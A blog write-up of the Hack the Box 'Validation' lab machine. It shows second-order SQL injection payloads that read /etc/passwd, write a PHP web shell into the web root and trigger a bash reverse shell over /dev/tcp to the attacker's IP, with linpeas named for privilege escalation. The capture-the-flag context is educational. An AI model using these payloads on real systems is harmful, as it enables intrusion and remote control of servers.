• Donald Ashdown

Hack the Box Validation

Updated: Apr 20

Summary

This was an amazing machine created by ippsec that required "second order" SQL injection. This provides the surface area to inject a webshell that interacts with system commands in the back end and we can execute a bash reverse shell. From here the initial user foothold allows for a file transfer of linpeas. Following this we are able to find a password in the /var/www/html config.php file.

Tools used
  • Burpsuite

  • Linpeas


Process / techniques
  • SQL injection

  • SQL second order injection

  • Command injection

  • Webshell injection with PHP SQL


References:

https://github.com/payloadbox/sql-injection-payload-listEnumeration


Enumeration

We start off with a basic nmap scan that provides many ports but only few are open. The filtered ports are probably not open or being blocked by the firewall. In order to be diligent I will start autorecon in the background to find any information I may miss during this process.



A second and more in-depth scan with the -sC and -sV flags yields some helpful information. In particular we find that our webserver is running Apache httpd 2.4.48 which is very up to date. Port 8080 is running nginx but responds 502.


-sC: Use default nmap enumeration scripts

-sV: Enumerate service versions in particular




Website Enumeration

Jumping into the website on port 80 we see a very basic landing page with an immediate form. So this is pretty indicative that we need to conduct web form enumeration.

Lest start with some basic checks.


  • Dirbusting

  • Subdomain enumeration

  • Platform version

  • Page forms



SQL Injection flow

Enumerating for SQL injection is imperative when presented with a web form. Here we are fortunate to work through an SQL problem that deals with second order SQL injection, which is a treat in the CTF/security world as it is rare. By virtue of being uncommon, it can be difficult, but the concept and practical application is rather lite as basic SQL injection.


Here is our processes and workflow for the SQL injection, for enumeration to our reverse shell.

  1. Single quote error based testing

  2. Payload testing

  3. Enumerate versions

  4. user()

  5. Read file

  6. Write file - shell.php

  7. Execute a reverse shell

1. Error based testing is a great way to start off our SQL enumeration. We start by dropping a single quote to see if there is an error or not. We of course see there is an error that reveals the web service is running out of the /var/www/html directory.



2. Payload testing: Here we pass common SQL payloads appended to our single quote. We know that our single quote is not being handled properly. We see that our data is stored in the backend and pushed to the front end on logging in. This is suggestive of second order SQL injection. We start dropping various payloads with a particular focus on a union attacks as we know our register form has 2 fields and is likely relying on a SQL Union statement.


Reference:

https://github.com/payloadbox/sql-injection-payload-list



3. Enumerate version Here we send a post form as user aaa and country Brazil. We intercept the request in Burpsuite and add a quote followed by UNION SELECT @@version ' to reveal the particular sql DB, Maria.



4. user()

username=aaa&country=Brazil ' UNION SELECT user()'




5. readfile

username=aaa&country=Brazil ' UNION SELECT LOAD_FILE("/etc/passwd")'


6.write file - shell.php

Test with normal file: username=aaa&country=Brazil' UNION SELECT "<?php booom ?>" INTO OUTFILE '/var/www/html/boom.php'-- -


username=aaa&country=Brazil' UNION SELECT "<?php SYSTEM($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'-- -



http://10.129.95.235/shell.php?cmd=bash%20-c%20%E2%80%98bash%20-i%20%3E&%20/dev/tcp/10.10.14.66/6363%202%3E&1%27




7. Execute a reverse shell

curl 10.129.95.235/shell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.16.44/6363 0>&1"'


The above is passed to the target backend host which passes the command line arguments to bash, and we successfully execute a bash reverse shell to our lisenter.




Root

As usual we start off by transferring the linpeas enumeration script to our target machine. This is performed by first spinning up a python3 simple http server from the linpeas directory. This file server runs over port 8000 by default.


Once linpeas is uploaded we proceed to look through the output and make note of our top 10 noticeable possible privillege escalation artifacts.





48 views0 comments